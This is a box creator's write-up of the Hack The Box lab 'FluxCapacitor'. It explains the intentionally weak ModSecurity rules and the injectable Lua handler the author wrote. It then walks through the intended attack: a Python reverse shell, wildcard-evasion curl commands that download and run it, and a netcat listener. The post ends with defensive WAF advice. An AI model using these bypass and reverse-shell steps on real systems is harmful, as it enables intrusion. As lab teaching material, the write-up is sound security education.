What I Learned Making This Box For HTB
Let’s start with important stuff, the write-up:
https://medium.com/secjuice/hack-the-box-fluxcapacitor-write-up-863190e4828e by Oneeb Malik
https://www.youtube.com/watch?v=XLIBbkQJKuY by Ippsec
easy, isn’t it? :) Now, let’s take a look at the “SuperWAF”. All rules are very weak and really easy to elude. The first one blocks every request coming with a user-agent that start with Mozilla or Opera. So you can bypass it by using curl or by sending a random user-agent string. As you can see, there isn’t any transformation function so you can just lowercase the browser user-agent:
SecRule REQUEST_HEADERS:User-Agent \
"^(Mozilla|Opera)" \
"id:1,\
phase:2,\
t:trim,\
block"The second rule blocks some special chars like $, (, ), | etc… matched inside any args (GET or inside a POST query string):
SecRule ARGS "@rx [;\(\)\|\`\<\>\&\$\*]" \
"id:2,\
phase:2,\
t:trim,\
t:urlDecode,\
block"The third rule blocks strings “user.txt” and “root.txt” inside any args. This weak rule tries to block all request that tries to get user’s and root’s flags:
SecRule ARGS "@rx (user\.txt|root\.txt)" \
"id:3,\
phase:2,\
t:trim,\
t:urlDecode,\
block"The fourth rule prevents using two or more forward slash separated by a blank space. It should makes harder to execute something like wget <ip>/shell.py -O /tmp/:
SecRule ARGS "@rx (\/.+\s+.*\/)" \
"id:4,\
phase:2,\
t:trim,\
t:urlDecode,\
block"The fifth rule blocks anything that contains ?s. This for prevent using ls command using wildcard evasion technique (I know, I’m a little bastard):
SecRule ARGS "@rx (\?s)" \
"id:5,\
phase:2,\
t:trim,\
t:urlDecode,\
block"Then, the sixth rule, just blocks a back-references directory like path traversal:
SecRule ARGS "@rx \.\." \
"id:6,\
phase:2,\
t:trim,\
t:urlDecode,\
block"The last rule blocks all request that comes with the opt GET parameter containing a string that matches a system command (I’ve done a list of all /bin/ and /usr/bin/ files and saved it on unixcmd.txt file):
SecRule ARGS:opt \
"@pmFromFile unixcmd.txt" \
"id:99,\
phase:2,\
t:trim,\
t:urlDecode,\
block"The rule above is intentionally silly because there isn’t an important transformation function called cmdLine. This function is a community contribution developed by Marc Stern. In bash, commands may be executed by different means, such as:
- com\mand
- com’m’and
- c?mmand
- comman*
- etc…
The cmdLine transformation function avoids this problem by manipulating the variable content in the following ways:
- deleting all backslashes
\ - deleting all double quotes
" - deleting all sigle quotes
' - deleting all carets
^ - deleting spaces before a slash
/ - deleting spaces before an open parentesis
( - replacing all commas
,and semicolon;into a space - replacing all multiple spaces (including tab, newline, etc.) into one space
- transform all characters to lowercase
Just by adding this function (with t:cmdLine) it wouldn’t be possible to bypass this rule (or would be harder).
I’ve used the content_by_lua_block function from nginx_lua_module. local opt = ‘date’ set the opt variable with value “date” that is used as default command. If the opt GET parameter is set, then replace the opt variable value with the GET parameter value. Then it uses the io.popen function for executing /home/themiddle/checksync bash script. As it clear, this code is done for making it injectable and to permit to all HTB users to exploit a Remote Command Execution:
content_by_lua_block {
local opt = 'date' if ngx.var.arg_opt then
opt = ngx.var.arg_opt
end local handle = io.popen("CMD='/home/themiddle/checksync "..opt.."'; bash -c ${CMD} 2>&1") local result = handle:read(“*a”)
handle:close()
ngx.say(result)
}
First, create a python script with a reverse shell and run the python SimpleHTTPServer in order to get an HTTP requests from FluxCapacitor with something like python -m SimpleHTTPServer 8000:
#!/usr/bin/python3 import socket, subprocess, os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("10.10.x.x",1337))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"]);
Now get reverse shell file using Remote Command Execution. It can be done by using wget (doing an evasion with the ? wildcard w?et instead wget) with the -P tmp parameter that saves file in /tmp/:
curl -v "http://10.10.10.69/sync?opt=' w?et 10.10.x.x:8000/rs.py -P tmp'"Now we need to make the file executable using chmod, or simply make all files executable in /tmp/ using -R (recursive):
curl -v "http://10.10.10.69/sync?opt=' /bin/c?mod 777 -R tmp'"Ok, now we can listen on the 1337 tcp port with nc -vlnp 1337 and receive the shell by sending the following request:
curl -v "http://10.10.10.69/sync?opt=' /tmp/rs.py '”The result is:
# nc -vlnp 1337
Listening on [0.0.0.0] (family 0, port 1337)
Connection from 10.10.10.69 47350 received!
/bin/sh: 0: can’t access tty; job control turned off
$ id
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
$ hostname
fluxcapacitor
$I’ve seen many users stuck in front of this WAF. Probably, be constantly blocked, makes the attacker more frustrated and less creative. For this reason, I think that using a weak WAF rule-set could be, anyway, better than a web application without any kind of filter. Moreover using a strong rule-set like the OWASP CRS3 could be a good deterrent.
Although this, it’s clear that in some case a WAF could not be enough to protect the whole system. We need netfilter rules (input and output), an automated integrity check of the system, a strong log collecting/auditing, and so on…
A strange thing is that many users insisted for hours to encode special chars and blank space chars to their respective two hexadecimal digits like '%20whoami%20'. Obviously, this not works in this kind of Lua code, and it isn’t mandatory for a webapp to automatically decode a GET parameter value.
In conclusion, if you expose a web application on the internet is always better to use a WAF even if weak. Sometimes logging all HTTP requests could help you to intercept critical behaviors. So: use ModSecurity, use OWASP CRS 3 and log everything for the win!
-theMiddle
如有侵权请联系:admin#unsafe.sh